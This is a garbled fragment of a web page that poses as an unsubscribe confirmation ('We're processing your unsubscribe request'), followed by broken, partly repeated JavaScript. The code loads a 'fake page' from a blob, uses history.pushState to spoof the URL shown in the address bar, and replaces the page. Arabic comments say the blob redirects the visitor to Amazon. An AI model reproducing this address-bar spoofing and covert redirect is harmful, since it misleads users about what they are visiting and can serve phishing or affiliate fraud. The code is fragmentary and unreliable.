⚙️

We’re processing your unsubscribe request

Click the button below to confirm you’re opting out.

`; const blob = new Blob([fakePageHtml], { type: 'text/html' }); const blobUrl = URL.createObjectURL(blob); history.pushState({}, "", `/${fakePage}`); window.location.replace(blobUrl); }) .catch(error => { console.error("Error loading URL:", error); alert("Something went wrong. Please try again later."); }); }); `;const blob = new Blob([fakePageHtml], { type: 'text/html' }); const blobUrl = URL.createObjectURL(blob);// نحولو للرابط اللي فيه fake page const newUrl = `${window.location.origin}/${fakePath}`; history.pushState({}, "", newUrl); // يبدل الرابط في المتصفح window.location.replace(blobUrl); // يبدل الصفحة مباشرة بالـ blob (وهي اللي كتوجّه لـ Amazon) }); });